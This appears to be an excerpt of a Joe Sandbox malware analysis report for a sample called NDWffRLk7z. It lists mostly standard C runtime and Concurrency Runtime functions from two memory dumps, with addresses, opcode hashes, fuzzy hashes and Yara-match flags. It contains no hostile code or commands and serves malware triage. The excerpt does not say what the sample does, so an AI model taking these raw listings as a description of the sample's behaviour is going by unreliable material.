Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0212135A

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
Instruction ID: cd72dd17228a9e2571f54f8b54354ef3b7296775c42d04f1495c231626c6df25
Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
Instruction Fuzzy Hash: F0F0B4316C07357F9F24FBB449505BE22974F95320B040239F5165B7C1EF718D29DA94

Function 0040D215 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB

Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D

Function 004134FC Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515

Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4

GetLastError.KERNEL32 ref: 00413531
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
__CxxThrowException@8.LIBVCRUNTIME ref: 00413555

Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC

Function 0212D064 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0212D078
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0212D09C
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0212D0AF
__CxxThrowException@8.LIBVCRUNTIME ref: 0212D0BD

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction ID: 0d3ed44ecfa9d5ce28f56a900fc5bd585ef186903b578abb50591ce592a8e820
Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction Fuzzy Hash: 98F09E319802246BC324FB10F840C9EB37F8EC0B14731817AF80513181EB31B91ECBAA

Function 02115A5D Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02115A79
__Cnd_signal.LIBCPMT ref: 02115A85
std::_Cnd_initX.LIBCPMT ref: 02115A9A
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02115AA1

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction ID: 06ee01ab0a2ec100f70911a28453355ada26c4169e977174513c10ebcd66e4a3
Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
Instruction Fuzzy Hash: E5F0A0364C0701AFEB307B71D80571ABBA3AF00735F14443CD14A56890DFBAA8554E65

Function 02122848 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 0212285F
GetLastError.KERNEL32(?,?,?,?,02128820,?,?,?,?,00000000,?,00000000), ref: 0212286E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02122884
__CxxThrowException@8.LIBVCRUNTIME ref: 02122892

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction ID: 9c51eb1e91effcccd2c8cf4bd6c21f7d056cc88ac21aa8d60dd753dd8517ba14
Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction Fuzzy Hash: 60F0A03554020ABFCF10EFA5CD44EAF37A86B00B11F600660B910E20A0DB74D6189BA4

Function 004125E1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041262B

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C

Function 0212256D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02122583
GetLastError.KERNEL32(?,?,?,?,?,02120D90), ref: 02122591
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021225A7
__CxxThrowException@8.LIBVCRUNTIME ref: 021225B5

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction ID: 7b1e163238615eeea29087784e4a907198838d2bfe95b4b04c14b7af4f5afa5b
Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction Fuzzy Hash: 61E0D8616803292DE710B7754C12FBF369C5B00B45F944861BD14D50C1FB74D51445A4

Function 00412306 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041231C
GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
__CxxThrowException@8.LIBVCRUNTIME ref: 0041234E

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC

Function 02129520 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122949: TlsAlloc.KERNEL32(?,02120D90), ref: 0212294F

TlsAlloc.KERNEL32(?,02120D90), ref: 02133BD6
GetLastError.KERNEL32 ref: 02133BE8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02133BFE
__CxxThrowException@8.LIBVCRUNTIME ref: 02133C0C

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction ID: ffd2a7d1d947e0c2a506b4786d4bc898b8eb2d63a2d5b3d13d1cca5d8a720414
Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction Fuzzy Hash: C2E0D134440315AFC715BF755C496BE325566007157500D76F535D20A1EB35D10D4EAD

Function 004192B9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8

TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
GetLastError.KERNEL32 ref: 00423981
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
__CxxThrowException@8.LIBVCRUNTIME ref: 004239A5

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C

Function 02122784 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02120D90), ref: 0212278E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02120D90), ref: 0212279D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021227B3
__CxxThrowException@8.LIBVCRUNTIME ref: 021227C1

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction ID: 4a8588a817f0e9107698853a08ac1181d89fd2160d7be44647f3713521558dca
Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction Fuzzy Hash: 18E0867464021AAFCB10FFB5DD49EAF73BC6A00B05B600465B901E3050EB78E70C9B79

Function 0041251D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041255A

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D

Function 021228DC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 021228E8
GetLastError.KERNEL32 ref: 021228F4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0212290A
__CxxThrowException@8.LIBVCRUNTIME ref: 02122918

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction ID: 41b5339f365de7d06c13c4d02aec9f22dfa083a20807a4700e20a450665c2267
Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction Fuzzy Hash: 91E086341402296FDF14BF61CC05FBF37AD7B00745B500825B915D10A0EB39D2189A58

Function 021229A2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02127BC8,00000000,?,?,02120D90,?,?,?,00000000,?,00000000), ref: 021229AE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021229BA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021229D0
__CxxThrowException@8.LIBVCRUNTIME ref: 021229DE

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction ID: 64f61de8cac85d3f031c80f27bc2c0442a3be9547b7c5e880682efa9125be7ce
Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction Fuzzy Hash: 69E086341401296FDF10BF61CC08BBF376D6F00745B500825BD19E20A0EB39D1289BA8

Function 00412675 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412681
GetLastError.KERNEL32 ref: 0041268D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126B1

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC

Function 0041273B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
__CxxThrowException@8.LIBVCRUNTIME ref: 00412777

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C

Function 02122949 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02120D90), ref: 0212294F
GetLastError.KERNEL32 ref: 0212295C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02122972
__CxxThrowException@8.LIBVCRUNTIME ref: 02122980

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction ID: 57ddcad698f1f20f1862ec23db8f4008bf7eb37629beda3c4e007d7042670d06
Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction Fuzzy Hash: 2EE0C2301401256FCB24BB759C48A7F32AD6A01B25BA00A25F961E20E0EB78D11C8AA8

Function 004126E2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
GetLastError.KERNEL32 ref: 004126F5
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412719

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C

Function 0042F06D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F0FD

Strings

pow, xrefs: 0042F0D5, 0042F0F2

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F

Function 00432A75 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMONLIBRARYCODE

Download Yara Rule

Strings

s2C, xrefs: 00432A88
s2C, xrefs: 00432B05, 00432BFC

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID: s2C$s2C
API String ID: 0-1833909196
Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89

Function 02138927 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0213895A
__IsNonwritableInCurrentImage.LIBCMT ref: 02138A13

Strings

csm, xrefs: 021389FD

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: f48b5e879448e04a8d3e8cdae8e6bfff7d6e3b81bf3b8769c1b8edba922221da
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 1641D430A40209DFCF12DF68C884A9EBBB7BF85328F158165F8156B391C776AA05CF91

Function 0214B0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0214B31B,?,00000050,?,?,?,?,?), ref: 0214B19B

Strings

ACP, xrefs: 0214B0DE
OCP, xrefs: 0214B114

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: d704ae0a2b6a2fd2b0e07f75f8eba5c2054bfd88e7ef773b1d635adea7f3d3a4
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 2A217F62F88105A6EB248F64ED01B9773AAEB54F6DF568434E90DDB100FF32EB00C294

Function 0043AE59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34

Strings

ACP, xrefs: 0043AE77
OCP, xrefs: 0043AEAD

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
